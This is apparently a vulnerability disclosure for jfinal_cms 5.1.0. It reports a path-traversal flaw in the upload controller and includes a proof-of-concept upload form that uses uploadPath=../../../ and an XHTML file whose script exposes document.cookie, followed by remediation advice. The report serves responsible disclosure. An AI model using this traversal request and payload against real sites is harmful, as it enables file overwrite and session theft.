jfinal_cms 5.1.0 file path injection vulnerability

[luchua-bc]

There is a CWE-073 - file path injection vulnerability with the upload controller.

If an admin user uploads a malicious file with injected path e.g. https://<jfinal_cms.site>/jfinal_cms/system/upload?uploadPath=../../../, the application will either serve malicious web pages or overwrite important system files.

A sample page to trigger the upload functionality is as follows:

<html>
        <body>
        <form method="post" action="https://<jfinal_cms.site>/jfinal_cms/system/upload?uploadPath=../../../" enctype="multipart/form-data" id="myfile">
                <input type="file" name="file">
                <input type="submit" value="Upload">
        </form>
        </body>
</html> 

The following sample XHTML file with JavaScript payload was used to showcase sensitive information like cookies can be leaked:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
</head>
<body>
<script type="text/javascript">
      alert(document.cookie);
</script>
<h1>POC</h1>
</body>
</html>

The XHTML file was successfully uploaded to the webroot directory, which broke out of the intended directory /upload/jflyfox/bbs/.

Accessing the file will leak session cookies, which confirmed the file path injection vulnerability:

Unsanitized user provided data must not be used to construct the file path. In order to prevent File
Path Injection, it is recommended to avoid concatenating user input directly into the file path. Instead,
user input should be checked against allowed (e.g., must come within user_content/) or disallowed
(e.g. must not come within /internal) paths, ensuring that neither path traversal using ../
nor URL encoding is used to evade these checks.

Please consider to fix the issue. Thanks.